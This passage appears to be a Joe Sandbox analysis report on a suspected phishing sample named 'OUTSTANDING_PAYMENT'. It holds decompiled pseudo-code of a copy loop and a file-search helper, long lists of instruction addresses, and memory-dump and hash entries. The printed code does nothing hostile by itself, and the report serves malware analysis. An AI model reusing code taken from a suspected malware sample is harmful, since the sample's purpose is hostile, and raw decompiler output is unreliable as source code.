									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                                                        0x00000000
                                                                                                                        0x00406d5f
                                                                                                                        0x00406d5f
                                                                                                                        0x00406d64
                                                                                                                        0x00406ddb
                                                                                                                        0x00406de2
                                                                                                                        0x00406dec
                                                                                                                        0x004073cb
                                                                                                                        0x004073cb
                                                                                                                        0x004073ce
                                                                                                                        0x004073ce
                                                                                                                        0x004073d4
                                                                                                                        0x004073da
                                                                                                                        0x004073e0
                                                                                                                        0x004073fa
                                                                                                                        0x004073fd
                                                                                                                        0x00407403
                                                                                                                        0x0040740e
                                                                                                                        0x00407410
                                                                                                                        0x004073e2
                                                                                                                        0x004073e2
                                                                                                                        0x004073f1
                                                                                                                        0x004073f5
                                                                                                                        0x004073f5
                                                                                                                        0x0040741a
                                                                                                                        0x00407441
                                                                                                                        0x00407441
                                                                                                                        0x00407447
                                                                                                                        0x00407447
                                                                                                                        0x00000000
                                                                                                                        0x0040741c
                                                                                                                        0x0040741c
                                                                                                                        0x00407420
                                                                                                                        0x004075cf
                                                                                                                        0x00000000
                                                                                                                        0x004075cf
                                                                                                                        0x0040742c
                                                                                                                        0x00407433
                                                                                                                        0x0040743b
                                                                                                                        0x0040743e
                                                                                                                        0x00000000
                                                                                                                        0x0040743e
                                                                                                                        0x00406d66
                                                                                                                        0x00406d66
                                                                                                                        0x00406d6a
                                                                                                                        0x00406d72
                                                                                                                        0x00406d75
                                                                                                                        0x00406d77
                                                                                                                        0x00406d7a
                                                                                                                        0x00406d7c
                                                                                                                        0x00406d81
                                                                                                                        0x00406d84
                                                                                                                        0x00406d8b
                                                                                                                        0x00406d92
                                                                                                                        0x00406d95
                                                                                                                        0x00406da0
                                                                                                                        0x00406da8
                                                                                                                        0x00406da8
                                                                                                                        0x00406da2
                                                                                                                        0x00406da2
                                                                                                                        0x00406da2
                                                                                                                        0x00406d97
                                                                                                                        0x00406d97
                                                                                                                        0x00406d97
                                                                                                                        0x00406daf
                                                                                                                        0x00406dcd
                                                                                                                        0x00406dcf
                                                                                                                        0x00406fa2
                                                                                                                        0x00406fa2
                                                                                                                        0x00406fa5
                                                                                                                        0x00406fa8
                                                                                                                        0x00406fab
                                                                                                                        0x00406fae
                                                                                                                        0x00406fb1
                                                                                                                        0x00406fb4
                                                                                                                        0x00406fb7
                                                                                                                        0x00406fba
                                                                                                                        0x00406fc0
                                                                                                                        0x00406fd8
                                                                                                                        0x00406fdb
                                                                                                                        0x00406fde
                                                                                                                        0x00406fe1
                                                                                                                        0x00406fe1
                                                                                                                        0x00406fe4
                                                                                                                        0x00406fea
                                                                                                                        0x00406fc2
                                                                                                                        0x00406fc2
                                                                                                                        0x00406fca
                                                                                                                        0x00406fcf
                                                                                                                        0x00406fd1
                                                                                                                        0x00406fd3
                                                                                                                        0x00406fd3
                                                                                                                        0x00406ff4
                                                                                                                        0x00406ff7
                                                                                                                        0x00406f9a
                                                                                                                        0x00406fa0
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406ff9
                                                                                                                        0x00406f75
                                                                                                                        0x00406f79
                                                                                                                        0x00407581
                                                                                                                        0x00000000
                                                                                                                        0x00407581
                                                                                                                        0x00406f7f
                                                                                                                        0x00406f82
                                                                                                                        0x00406f85
                                                                                                                        0x00406f89
                                                                                                                        0x00406f8c
                                                                                                                        0x00406f92
                                                                                                                        0x00406f94
                                                                                                                        0x00406f94
                                                                                                                        0x00406f97
                                                                                                                        0x00000000
                                                                                                                        0x00406f97
                                                                                                                        0x00406db1
                                                                                                                        0x00406db1
                                                                                                                        0x00406db4
                                                                                                                        0x00406dba
                                                                                                                        0x00406dbc
                                                                                                                        0x00406dbc
                                                                                                                        0x00406dbf
                                                                                                                        0x00406dc2
                                                                                                                        0x00406dc4
                                                                                                                        0x00406dc5
                                                                                                                        0x00406dc8
                                                                                                                        0x00406e35
                                                                                                                        0x00406e35
                                                                                                                        0x00406e39
                                                                                                                        0x00406e3c
                                                                                                                        0x00406e3f
                                                                                                                        0x00406e42
                                                                                                                        0x00406e45
                                                                                                                        0x00406e46
                                                                                                                        0x00406e49
                                                                                                                        0x00406e4b
                                                                                                                        0x00406e51
                                                                                                                        0x00406e54
                                                                                                                        0x00406e57
                                                                                                                        0x00406e5a
                                                                                                                        0x00406e5d
                                                                                                                        0x00406e63
                                                                                                                        0x00406e7f
                                                                                                                        0x00406e82
                                                                                                                        0x00406e85
                                                                                                                        0x00406e88
                                                                                                                        0x00406e8f
                                                                                                                        0x00406e95
                                                                                                                        0x00406e99
                                                                                                                        0x00406e65
                                                                                                                        0x00406e65
                                                                                                                        0x00406e69
                                                                                                                        0x00406e71
                                                                                                                        0x00406e76
                                                                                                                        0x00406e78
                                                                                                                        0x00406e7a
                                                                                                                        0x00406e7a
                                                                                                                        0x00406ea3
                                                                                                                        0x00406ea6
                                                                                                                        0x00406e1d
                                                                                                                        0x00406e1d
                                                                                                                        0x00406e23
                                                                                                                        0x00406ed6
                                                                                                                        0x00406edc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406ede
                                                                                                                        0x00406ee1
                                                                                                                        0x00406ee4
                                                                                                                        0x00406ee7
                                                                                                                        0x00406eea
                                                                                                                        0x00406eed
                                                                                                                        0x00406ef0
                                                                                                                        0x00406ef3
                                                                                                                        0x00406ef6
                                                                                                                        0x00406efc
                                                                                                                        0x00406f14
                                                                                                                        0x00406f17
                                                                                                                        0x00406f1a
                                                                                                                        0x00406f1d
                                                                                                                        0x00406f1d
                                                                                                                        0x00406f20
                                                                                                                        0x00406f26
                                                                                                                        0x00406efe
                                                                                                                        0x00406efe
                                                                                                                        0x00406f06
                                                                                                                        0x00406f0b
                                                                                                                        0x00406f0d
                                                                                                                        0x00406f0f
                                                                                                                        0x00406f0f
                                                                                                                        0x00406f30
                                                                                                                        0x00406f33
                                                                                                                        0x00406eb1
                                                                                                                        0x00406eb5
                                                                                                                        0x00407575
                                                                                                                        0x00000000
                                                                                                                        0x00407575
                                                                                                                        0x00406ebb
                                                                                                                        0x00406ebe
                                                                                                                        0x00406ec1
                                                                                                                        0x00406ec5
                                                                                                                        0x00406ec8
                                                                                                                        0x00406ece
                                                                                                                        0x00406ed0
                                                                                                                        0x00406ed0
                                                                                                                        0x00406ed3
                                                                                                                        0x00406ed3
                                                                                                                        0x00406f33
                                                                                                                        0x00406f3a
                                                                                                                        0x00406f3a
                                                                                                                        0x00406f3a
                                                                                                                        0x00406f3e
                                                                                                                        0x00406f3e
                                                                                                                        0x00406f41
                                                                                                                        0x00406f44
                                                                                                                        0x00406f48
                                                                                                                        0x0040758d
                                                                                                                        0x00000000
                                                                                                                        0x0040758d
                                                                                                                        0x00406f4e
                                                                                                                        0x00406f51
                                                                                                                        0x00406f54
                                                                                                                        0x00406f57
                                                                                                                        0x00406f5a
                                                                                                                        0x00406f5d
                                                                                                                        0x00406f60
                                                                                                                        0x00406f62
                                                                                                                        0x00406f65
                                                                                                                        0x00406f68
                                                                                                                        0x00406f6b
                                                                                                                        0x00406f6d
                                                                                                                        0x00406f6d
                                                                                                                        0x00406f6d
                                                                                                                        0x0040710a
                                                                                                                        0x0040710a
                                                                                                                        0x0040710d
                                                                                                                        0x0040710d
                                                                                                                        0x00000000
                                                                                                                        0x0040710d
                                                                                                                        0x00406e2f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406eac
                                                                                                                        0x00406df8
                                                                                                                        0x00406dfc
                                                                                                                        0x00407569
                                                                                                                        0x004075e5
                                                                                                                        0x004075ed
                                                                                                                        0x004075f4
                                                                                                                        0x004075f6
                                                                                                                        0x004075fd
                                                                                                                        0x00407601
                                                                                                                        0x00407601
                                                                                                                        0x00406e02
                                                                                                                        0x00406e05
                                                                                                                        0x00406e08
                                                                                                                        0x00406e0c
                                                                                                                        0x00406e0f
                                                                                                                        0x00406e15
                                                                                                                        0x00406e17
                                                                                                                        0x00406e17
                                                                                                                        0x00406e1a
                                                                                                                        0x00000000
                                                                                                                        0x00406e1a
                                                                                                                        0x00406ea6
                                                                                                                        0x00406daf
                                                                                                                        0x00406be3
                                                                                                                        0x00406be3
                                                                                                                        0x00406bec
                                                                                                                        0x004075fa
                                                                                                                        0x004075fa
                                                                                                                        0x00000000
                                                                                                                        0x004075fa
                                                                                                                        0x00406bf2
                                                                                                                        0x00000000
                                                                                                                        0x00406bfd
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406c06
                                                                                                                        0x00406c09
                                                                                                                        0x00406c0c
                                                                                                                        0x00406c10
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406c16
                                                                                                                        0x00406c19
                                                                                                                        0x00406c1b
                                                                                                                        0x00406c1c
                                                                                                                        0x00406c1f
                                                                                                                        0x00406c21
                                                                                                                        0x00406c22
                                                                                                                        0x00406c24
                                                                                                                        0x00406c27
                                                                                                                        0x00406c2c
                                                                                                                        0x00406c31
                                                                                                                        0x00406c3a
                                                                                                                        0x00406c4d
                                                                                                                        0x00406c50
                                                                                                                        0x00406c5c
                                                                                                                        0x00406c84
                                                                                                                        0x00406c86
                                                                                                                        0x00406c94
                                                                                                                        0x00406c94
                                                                                                                        0x00406c98
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406c88
                                                                                                                        0x00406c88
                                                                                                                        0x00406c8b
                                                                                                                        0x00406c8c
                                                                                                                        0x00406c8c
                                                                                                                        0x00000000
                                                                                                                        0x00406c88
                                                                                                                        0x00406c62
                                                                                                                        0x00406c67
                                                                                                                        0x00406c67
                                                                                                                        0x00406c70
                                                                                                                        0x00406c78
                                                                                                                        0x00406c7b
                                                                                                                        0x00000000
                                                                                                                        0x00406c81
                                                                                                                        0x00406c81
                                                                                                                        0x00000000
                                                                                                                        0x00406c81
                                                                                                                        0x00000000
                                                                                                                        0x00406c9e
                                                                                                                        0x00406c9e
                                                                                                                        0x00406ca2
                                                                                                                        0x0040754e
                                                                                                                        0x00000000
                                                                                                                        0x0040754e
                                                                                                                        0x00406cab
                                                                                                                        0x00406cbb
                                                                                                                        0x00406cbe
                                                                                                                        0x00406cc1
                                                                                                                        0x00406cc1
                                                                                                                        0x00406cc1
                                                                                                                        0x00406cc4
                                                                                                                        0x00406cc8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406cca
                                                                                                                        0x00406cd0
                                                                                                                        0x00406cfa
                                                                                                                        0x00406d00
                                                                                                                        0x00406d07
                                                                                                                        0x00000000
                                                                                                                        0x00406d07
                                                                                                                        0x00406cd6
                                                                                                                        0x00406cd9
                                                                                                                        0x00406cde
                                                                                                                        0x00406cde
                                                                                                                        0x00406ce9
                                                                                                                        0x00406cf1
                                                                                                                        0x00406cf4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406d39
                                                                                                                        0x00406d3f
                                                                                                                        0x00406d42
                                                                                                                        0x00406d4f
                                                                                                                        0x00406d57
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406d0e
                                                                                                                        0x00406d0e
                                                                                                                        0x00406d12
                                                                                                                        0x0040755d
                                                                                                                        0x00000000
                                                                                                                        0x0040755d
                                                                                                                        0x00406d1e
                                                                                                                        0x00406d29
                                                                                                                        0x00406d29
                                                                                                                        0x00406d29
                                                                                                                        0x00406d2c
                                                                                                                        0x00406d2f
                                                                                                                        0x00406d32
                                                                                                                        0x00406d37
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406ffe
                                                                                                                        0x00407002
                                                                                                                        0x00407020
                                                                                                                        0x00407023
                                                                                                                        0x0040702a
                                                                                                                        0x0040702d
                                                                                                                        0x00407030
                                                                                                                        0x00407033
                                                                                                                        0x00407036
                                                                                                                        0x00407039
                                                                                                                        0x0040703b
                                                                                                                        0x00407042
                                                                                                                        0x00407043
                                                                                                                        0x00407045
                                                                                                                        0x00407048
                                                                                                                        0x0040704b
                                                                                                                        0x0040704e
                                                                                                                        0x0040704e
                                                                                                                        0x00407053
                                                                                                                        0x00000000
                                                                                                                        0x00407053
                                                                                                                        0x00407004
                                                                                                                        0x00407007
                                                                                                                        0x0040700a
                                                                                                                        0x00407014
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407068
                                                                                                                        0x0040706c
                                                                                                                        0x0040708f
                                                                                                                        0x00407092
                                                                                                                        0x00407095
                                                                                                                        0x0040709f
                                                                                                                        0x0040706e
                                                                                                                        0x0040706e
                                                                                                                        0x00407071
                                                                                                                        0x00407074
                                                                                                                        0x00407077
                                                                                                                        0x00407084
                                                                                                                        0x00407087
                                                                                                                        0x00407087
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004070ab
                                                                                                                        0x004070af
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004070b5
                                                                                                                        0x004070b9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004070bf
                                                                                                                        0x004070c1
                                                                                                                        0x004070c5
                                                                                                                        0x004070c5
                                                                                                                        0x004070c8
                                                                                                                        0x004070cc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040711c
                                                                                                                        0x00407120
                                                                                                                        0x00407127
                                                                                                                        0x0040712a
                                                                                                                        0x0040712d
                                                                                                                        0x00407137
                                                                                                                        0x00000000
                                                                                                                        0x00407137
                                                                                                                        0x00407122
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407143
                                                                                                                        0x00407147
                                                                                                                        0x0040714e
                                                                                                                        0x00407151
                                                                                                                        0x00407154
                                                                                                                        0x00407149
                                                                                                                        0x00407149
                                                                                                                        0x00407149
                                                                                                                        0x00407157
                                                                                                                        0x0040715a
                                                                                                                        0x0040715d
                                                                                                                        0x0040715d
                                                                                                                        0x00407160
                                                                                                                        0x00407163
                                                                                                                        0x00407166
                                                                                                                        0x00407166
                                                                                                                        0x00407169
                                                                                                                        0x00407170
                                                                                                                        0x00407175
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407203
                                                                                                                        0x00407203
                                                                                                                        0x00407207
                                                                                                                        0x004075a5
                                                                                                                        0x00000000
                                                                                                                        0x004075a5
                                                                                                                        0x0040720d
                                                                                                                        0x00407210
                                                                                                                        0x00407213
                                                                                                                        0x00407217
                                                                                                                        0x0040721a
                                                                                                                        0x00407220
                                                                                                                        0x00407222
                                                                                                                        0x00407222
                                                                                                                        0x00407222
                                                                                                                        0x00407225
                                                                                                                        0x00407228
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407286
                                                                                                                        0x00407286
                                                                                                                        0x0040728a
                                                                                                                        0x004075b1
                                                                                                                        0x00000000
                                                                                                                        0x004075b1
                                                                                                                        0x00407290
                                                                                                                        0x00407293
                                                                                                                        0x00407296
                                                                                                                        0x0040729a
                                                                                                                        0x0040729d
                                                                                                                        0x004072a3
                                                                                                                        0x004072a5
                                                                                                                        0x004072a5
                                                                                                                        0x004072a5
                                                                                                                        0x004072a8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407056
                                                                                                                        0x00407056
                                                                                                                        0x00407059
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407395
                                                                                                                        0x00407399
                                                                                                                        0x004073bb
                                                                                                                        0x004073be
                                                                                                                        0x004073c8
                                                                                                                        0x00000000
                                                                                                                        0x004073c8
                                                                                                                        0x0040739b
                                                                                                                        0x0040739e
                                                                                                                        0x004073a2
                                                                                                                        0x004073a5
                                                                                                                        0x004073a5
                                                                                                                        0x004073a8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407452
                                                                                                                        0x00407456
                                                                                                                        0x00407474
                                                                                                                        0x00407474
                                                                                                                        0x00407474
                                                                                                                        0x0040747b
                                                                                                                        0x00407482
                                                                                                                        0x00407489
                                                                                                                        0x00407489
                                                                                                                        0x00000000
                                                                                                                        0x00407489
                                                                                                                        0x00407458
                                                                                                                        0x0040745b
                                                                                                                        0x0040745e
                                                                                                                        0x00407461
                                                                                                                        0x00407468
                                                                                                                        0x004073ac
                                                                                                                        0x004073ac
                                                                                                                        0x004073af
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407543
                                                                                                                        0x00407546
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040717d
                                                                                                                        0x0040717f
                                                                                                                        0x00407186
                                                                                                                        0x00407187
                                                                                                                        0x00407189
                                                                                                                        0x0040718c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407194
                                                                                                                        0x00407197
                                                                                                                        0x0040719a
                                                                                                                        0x0040719c
                                                                                                                        0x0040719e
                                                                                                                        0x0040719e
                                                                                                                        0x0040719f
                                                                                                                        0x004071a2
                                                                                                                        0x004071a9
                                                                                                                        0x004071ac
                                                                                                                        0x004071ba
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407490
                                                                                                                        0x00407490
                                                                                                                        0x00407493
                                                                                                                        0x0040749a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040749f
                                                                                                                        0x0040749f
                                                                                                                        0x004074a3
                                                                                                                        0x004075db
                                                                                                                        0x00000000
                                                                                                                        0x004075db
                                                                                                                        0x004074a9
                                                                                                                        0x004074ac
                                                                                                                        0x004074af
                                                                                                                        0x004074b3
                                                                                                                        0x004074b6
                                                                                                                        0x004074bc
                                                                                                                        0x004074be
                                                                                                                        0x004074be
                                                                                                                        0x004074be
                                                                                                                        0x004074c1
                                                                                                                        0x004074c4
                                                                                                                        0x004074c4
                                                                                                                        0x004074c4
                                                                                                                        0x004074c4
                                                                                                                        0x004074c7
                                                                                                                        0x004074c7
                                                                                                                        0x004074cb
                                                                                                                        0x0040752b
                                                                                                                        0x0040752e
                                                                                                                        0x00407533
                                                                                                                        0x00407534
                                                                                                                        0x00407536
                                                                                                                        0x00407538
                                                                                                                        0x0040753b
                                                                                                                        0x00000000
                                                                                                                        0x0040753b
                                                                                                                        0x004074cd
                                                                                                                        0x004074d3
                                                                                                                        0x004074d6
                                                                                                                        0x004074d9
                                                                                                                        0x004074dc
                                                                                                                        0x004074df
                                                                                                                        0x004074e2
                                                                                                                        0x004074e5
                                                                                                                        0x004074e8
                                                                                                                        0x004074eb
                                                                                                                        0x004074ee
                                                                                                                        0x00407507
                                                                                                                        0x0040750a
                                                                                                                        0x0040750d
                                                                                                                        0x00407510
                                                                                                                        0x00407514
                                                                                                                        0x00407516
                                                                                                                        0x00407516
                                                                                                                        0x00407517
                                                                                                                        0x0040751a
                                                                                                                        0x004074f0
                                                                                                                        0x004074f0
                                                                                                                        0x004074f8
                                                                                                                        0x004074fd
                                                                                                                        0x004074ff
                                                                                                                        0x00407502
                                                                                                                        0x00407502
                                                                                                                        0x0040751d
                                                                                                                        0x00407524
                                                                                                                        0x00000000
                                                                                                                        0x00407526
                                                                                                                        0x00000000
                                                                                                                        0x00407526
                                                                                                                        0x00000000
                                                                                                                        0x004071c2
                                                                                                                        0x004071c5
                                                                                                                        0x004071fb
                                                                                                                        0x0040732b
                                                                                                                        0x0040732b
                                                                                                                        0x0040732b
                                                                                                                        0x0040732b
                                                                                                                        0x0040732e
                                                                                                                        0x0040732e
                                                                                                                        0x00407331
                                                                                                                        0x00407333
                                                                                                                        0x004075bd
                                                                                                                        0x00000000
                                                                                                                        0x004075bd
                                                                                                                        0x00407339
                                                                                                                        0x0040733c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407342
                                                                                                                        0x00407346
                                                                                                                        0x00407349
                                                                                                                        0x00407349
                                                                                                                        0x00407349
                                                                                                                        0x00000000
                                                                                                                        0x00407349
                                                                                                                        0x004071c7
                                                                                                                        0x004071c9
                                                                                                                        0x004071cb
                                                                                                                        0x004071cd
                                                                                                                        0x004071d0
                                                                                                                        0x004071d1
                                                                                                                        0x004071d3
                                                                                                                        0x004071d5
                                                                                                                        0x004071d8
                                                                                                                        0x004071db
                                                                                                                        0x004071f1
                                                                                                                        0x004071f6
                                                                                                                        0x0040722e
                                                                                                                        0x0040722e
                                                                                                                        0x00407232
                                                                                                                        0x0040725e
                                                                                                                        0x00407260
                                                                                                                        0x00407267
                                                                                                                        0x0040726a
                                                                                                                        0x0040726d
                                                                                                                        0x0040726d
                                                                                                                        0x00407272
                                                                                                                        0x00407272
                                                                                                                        0x00407274
                                                                                                                        0x00407277
                                                                                                                        0x0040727e
                                                                                                                        0x00407281
                                                                                                                        0x004072ae
                                                                                                                        0x004072ae
                                                                                                                        0x004072b1
                                                                                                                        0x004072b4
                                                                                                                        0x00407328
                                                                                                                        0x00407328
                                                                                                                        0x00407328
                                                                                                                        0x00000000
                                                                                                                        0x00407328
                                                                                                                        0x004072b6
                                                                                                                        0x004072bc
                                                                                                                        0x004072bf
                                                                                                                        0x004072c2
                                                                                                                        0x004072c5
                                                                                                                        0x004072c8
                                                                                                                        0x004072cb
                                                                                                                        0x004072ce
                                                                                                                        0x004072d1
                                                                                                                        0x004072d4
                                                                                                                        0x004072d7
                                                                                                                        0x004072f0
                                                                                                                        0x004072f2
                                                                                                                        0x004072f5
                                                                                                                        0x004072f6
                                                                                                                        0x004072f9
                                                                                                                        0x004072fb
                                                                                                                        0x004072fe
                                                                                                                        0x00407300
                                                                                                                        0x00407302
                                                                                                                        0x00407305
                                                                                                                        0x00407307
                                                                                                                        0x0040730a
                                                                                                                        0x0040730e
                                                                                                                        0x00407310
                                                                                                                        0x00407310
                                                                                                                        0x00407311
                                                                                                                        0x00407314
                                                                                                                        0x00407317
                                                                                                                        0x004072d9
                                                                                                                        0x004072d9
                                                                                                                        0x004072e1
                                                                                                                        0x004072e6
                                                                                                                        0x004072e8
                                                                                                                        0x004072eb
                                                                                                                        0x004072eb
                                                                                                                        0x0040731a
                                                                                                                        0x00407321
                                                                                                                        0x004072ab
                                                                                                                        0x004072ab
                                                                                                                        0x004072ab
                                                                                                                        0x004072ab
                                                                                                                        0x00000000
                                                                                                                        0x00407323
                                                                                                                        0x00000000
                                                                                                                        0x00407323
                                                                                                                        0x00407321
                                                                                                                        0x00407234
                                                                                                                        0x00407237
                                                                                                                        0x00407239
                                                                                                                        0x0040723c
                                                                                                                        0x0040723f
                                                                                                                        0x00407242
                                                                                                                        0x00407244
                                                                                                                        0x00407247
                                                                                                                        0x0040724a
                                                                                                                        0x0040724a
                                                                                                                        0x0040724d
                                                                                                                        0x0040724d
                                                                                                                        0x00407250
                                                                                                                        0x00407257
                                                                                                                        0x0040722b
                                                                                                                        0x0040722b
                                                                                                                        0x0040722b
                                                                                                                        0x0040722b
                                                                                                                        0x00000000
                                                                                                                        0x00407259
                                                                                                                        0x00000000
                                                                                                                        0x00407259
                                                                                                                        0x00407257
                                                                                                                        0x004071dd
                                                                                                                        0x004071e0
                                                                                                                        0x004071e2
                                                                                                                        0x004071e5
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004070cf
                                                                                                                        0x004070cf
                                                                                                                        0x004070d3
                                                                                                                        0x00407599
                                                                                                                        0x00000000
                                                                                                                        0x00407599
                                                                                                                        0x004070d9
                                                                                                                        0x004070dc
                                                                                                                        0x004070df
                                                                                                                        0x004070e2
                                                                                                                        0x004070e4
                                                                                                                        0x004070e4
                                                                                                                        0x004070e4
                                                                                                                        0x004070e7
                                                                                                                        0x004070ea
                                                                                                                        0x004070ed
                                                                                                                        0x004070f0
                                                                                                                        0x004070f3
                                                                                                                        0x004070f6
                                                                                                                        0x004070f7
                                                                                                                        0x004070f9
                                                                                                                        0x004070f9
                                                                                                                        0x004070f9
                                                                                                                        0x004070fc
                                                                                                                        0x004070ff
                                                                                                                        0x00407102
                                                                                                                        0x00407105
                                                                                                                        0x00407105
                                                                                                                        0x00407105
                                                                                                                        0x00407108
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040734c
                                                                                                                        0x0040734c
                                                                                                                        0x0040734c
                                                                                                                        0x00407350
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407356
                                                                                                                        0x00407359
                                                                                                                        0x0040735c
                                                                                                                        0x0040735f
                                                                                                                        0x00407361
                                                                                                                        0x00407361
                                                                                                                        0x00407361
                                                                                                                        0x00407364
                                                                                                                        0x00407367
                                                                                                                        0x0040736a
                                                                                                                        0x0040736d
                                                                                                                        0x00407370
                                                                                                                        0x00407373
                                                                                                                        0x00407374
                                                                                                                        0x00407376
                                                                                                                        0x00407376
                                                                                                                        0x00407376
                                                                                                                        0x00407379
                                                                                                                        0x0040737c
                                                                                                                        0x0040737f
                                                                                                                        0x00407382
                                                                                                                        0x00407385
                                                                                                                        0x00407389
                                                                                                                        0x0040738b
                                                                                                                        0x0040738e
                                                                                                                        0x00000000
                                                                                                                        0x00407390
                                                                                                                        0x00000000
                                                                                                                        0x00407390
                                                                                                                        0x0040738e
                                                                                                                        0x004075c3
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406bf2

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                                                        • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                                                                                        • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                                                        • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E0040699E(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426798); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426798;
			}




                                                                                                                        0x004069a9
                                                                                                                        0x004069b2
                                                                                                                        0x00000000
                                                                                                                        0x004069bf
                                                                                                                        0x004069b5
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNELBASE(74D0FAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,74D0FAA0,?,74D0F560,00405D94,?,74D0FAA0,74D0F560), ref: 004069A9
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 004069B5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
